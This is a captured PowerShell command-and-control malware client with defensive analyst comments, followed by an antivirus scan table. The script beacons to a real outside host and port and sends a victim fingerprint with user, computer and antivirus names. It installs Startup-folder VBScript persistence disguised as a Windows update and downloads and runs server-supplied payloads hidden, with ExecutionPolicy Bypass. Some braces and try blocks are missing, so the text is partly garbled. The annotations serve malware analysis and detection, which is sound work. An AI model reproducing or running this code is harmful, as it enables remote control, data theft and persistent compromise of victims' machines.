# --- Script-level setup for a PowerShell C2 client (sample as captured; braces are missing in places, see function comments) ---
# System.Windows.Forms is loaded but nothing in the visible code references it.
Add-Type -AssemblyName System.Windows.Forms
# Microsoft.VisualBasic supplies Interaction.CreateObject and Strings.Split used below.
Add-Type -AssemblyName Microsoft.VisualBasic
# Late-bound Microsoft.XMLHTTP COM object; all C2 traffic goes through it (see POST).
$httpobj = [Microsoft.VisualBasic.Interaction]::CreateObject("Microsoft.XMLHTTP")
# C2 host and port. Combined in POST into http://<h>:<p>/<path> - the network indicator for this sample.
[String] $h = "serv01.nerdpol.ovh"
[String] $p = "7501"
# Field delimiter used to split C2 responses into command and arguments (main loop).
$spl = "|V|"
# Suppress every non-terminating error for the rest of the script, so failures are silent.
$ErrorActionPreference = 'SilentlyContinue'
# Persistence: drops a VBScript launcher into the user's Startup folder that re-runs this script at logon.
# NOTE(analysis): the function's closing brace is not present on the page (extraction artifact).
function install() {
# The byte array decodes (Encoding.Default) to a two-line VBScript:
#   Set OBB = CreateObject("WScript.Shell")
#   OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"%FILE%",0
# i.e. a hidden-window (0) PowerShell launch of the path substituted for %FILE%.
[String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
# SpecialFolder 7 is the per-user Startup folder. %FILE% becomes $PSCommandPath (this script's own path).
# Artifact to hunt for: <Startup>\Windows10DecemberUpdate.vbs.
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\Windows10DecemberUpdate.vbs', $startup.Replace('%FILE%', $PSCommandPath))
# Returns the display name(s) of installed AV products via the SecurityCenter2 WMI namespace.
# Used by inf to include the AV name in the victim fingerprint.
# NOTE(analysis): the param block's closing ")" and the function's closing brace are missing on the page.
function Get-AntivirusName {
[cmdletBinding()]
param (
# Target machine; defaults to the local computer name.
[string]$ComputerName = "$env:computername" ,
# Optional credential; forwarded to Get-WmiObject through @psboundparameters.
$Credential
BEGIN
{
$wmiQuery = "SELECT * FROM AntiVirusProduct"
}
PROCESS
{
# Any bound parameters (ComputerName, Credential) are splatted straight into Get-WmiObject.
$AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
return $AntivirusProduct.displayName
}
END {
}
# Decodes a string of '0'/'1' characters, 8 per byte, into an ASCII string.
# Not referenced anywhere in the visible code. Closing braces for the loop and function are missing on the page.
Function Binary2String([String] $data) {
$byteList = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $data.Length; $i +=8) {
# Each 8-character window is parsed as a base-2 number (Convert.ToByte with fromBase 2).
$byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
# Sends a synchronous HTTP POST to the C2 and returns the response body as a string.
#   $DA    - URL path appended to http://<h>:<p>/
#   $Param - request body
# The victim fingerprint ($info, computed once at script start) is sent in a "User-Agent:" header
# (header name written with a trailing colon, exactly as in the sample) - useful for network detection.
# NOTE(analysis): a "} catch { }" appears with no visible "try {" and the function's closing brace is
# missing; the page is garbled here. Any error is swallowed and an empty string is returned.
function POST($DA, $Param) {
$ResponseText = ""
# $false = synchronous request.
$httpobj.Open("POST", "http://" + $h + ":" + $p + "/" + $DA, $false)
$httpobj.SetRequestHeader("User-Agent:", $info)
$httpobj.Send($Param)
$ResponseText = [System.Convert]::ToString($httpobj.ResponseText)
} catch { }
return $ResponseText
# Builds the victim fingerprint string that POST sends as the User-Agent value.
# Layout (backslash-separated): <id>\<computer name>\<user name>\<OS name + architecture>\<AV name>\Yes\Yes\FALSE\
# NOTE(analysis): closing brace missing on the page.
function inf {
$av = Get-AntivirusName
# Client version tag; assigned but not used in the visible return value.
$vr = "v2.0"
# Hardware id derived from the system product UUID (see HWID).
$mac = HWID($env:computername)
# $wormID is never assigned in the visible code, so $id presumably reduces to the HWID alone - confirm against the full sample.
$id = $wormID + "" + $mac
# Win32_OperatingSystem.Name is "|"-delimited; only the first segment (product name) is kept, then the architecture is appended.
$os = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,"|")[0] + " " + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
return $id + "\" + ($env:COMPUTERNAME) + "\" + ($env:UserName) + "\" + $os + "\" + $av + "\" + "Yes" + "\" + "Yes" + "\" + "FALSE" + "\"
# Derives a host identifier from the Win32_ComputerSystemProduct UUID: the first two hyphen-separated
# segments concatenated. The $strComputer parameter is accepted but never used - the query is always local.
# NOTE(analysis): closing brace missing on the page.
function HWID($strComputer) {
$ErrorActionPreference = 'SilentlyContinue'
$lol = [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))
return ([Microsoft.VisualBasic.Strings]::Split($lol,'-')[0] + [Microsoft.VisualBasic.Strings]::Split($lol,'-')[1])
# --- Entry point: fingerprint once, install persistence, then poll the C2 forever ---
# Fingerprint is computed a single time and reused as the User-Agent value in every POST.
$info = inf
# Drops <Startup>\Windows10DecemberUpdate.vbs (see install).
install
# NOTE(analysis): the opening/closing braces of this loop and of the switch are missing on the page.
while($true)
# Beacon: POST to the "Vre" path; the response is split on "|V|" into [command, payload, name, ...].
$A = [Microsoft.VisualBasic.Strings]::Split((POST("Vre", "")) , $spl)
switch($A[0]) {
# RF: write the raw bytes of field 1 to %TEMP%\<field 2> and execute it.
"RF" {
$TargetPath = [System.IO.Path]::GetTempPath() + $A[2]
[System.IO.File]::WriteAllBytes($TargetPath, [System.Text.Encoding]::Default.GetBytes($A[1]))
[System.Diagnostics.Process]::Start($TargetPath)
break }
# TR: persist and run a delivered PowerShell script.
"TR" {
# Random GUID-based file name with a .PS1 extension in %TEMP%.
[String] $PsFileName = [System.Guid]::NewGuid().ToString().Replace("-", "") + ".PS1"
# Bytes decode to:
#   Set WshShell = CreateObject("WScript.Shell")
#   WshShell.Run "Powershell -ExecutionPolicy Bypass -File " + "%PT%", 0
[String] $StartupContent = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,87,115,104,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,117,110,32,34,80,111,119,101,114,115,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,70,105,108,101,32,34,32,43,32,34,37,80,84,37,34,44,32,48))
$TargetPath = [System.IO.Path]::GetTempPath() + $PsFileName
[System.IO.File]::WriteAllText($TargetPath, $A[1])
# Second persistence artifact: <Startup>\WinLOGON.vbs launching the dropped .PS1 at logon.
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\WinLOGON.vbs", $StartupContent.Replace("%PT%", $TargetPath))
# Immediate hidden execution with ExecutionPolicy Bypass - a strong process-creation telemetry signal.
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File $TargetPath
#[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\" + $PsFileName.Replace(".PS1", ".cmd"), "Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -File " + $TargetPath)
break }
# exc: write field 1 as a .vbs with a random 5-letter name in %TEMP% and execute it.
"exc" {
$Filename = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) + ".vbs"
$TargetPath = [System.IO.Path]::GetTempPath() + $Filename
$CurrSc = $A[1]
[System.IO.File]::WriteAllText($TargetPath, $CurrSc)
[System.Diagnostics.Process]::Start($TargetPath)
break }
# Sc: like RF but the payload is written as text to %TEMP%\<field 2> and executed.
"Sc" {
$TargetPath = [System.IO.Path]::GetTempPath() + $A[2]
[System.IO.File]::WriteAllText($TargetPath, $A[1])
[System.Diagnostics.Process]::Start($TargetPath)
break }
# Cl / Un: both simply exit the process. Neither removes the Startup artifacts written above.
"Cl" {
[System.Environment]::Exit(0)
break }
"Un" {
[System.Environment]::Exit(0)
break }
# Poll interval: 3 seconds between beacons.
[System.Threading.Thread]::Sleep(3000)
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.WH
TrendMicro-HouseCall Clean
Avast SNH:Script [Dropper]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
AhnLab-V3 Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
MAX Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG SNH:Script [Dropper]
Panda Clean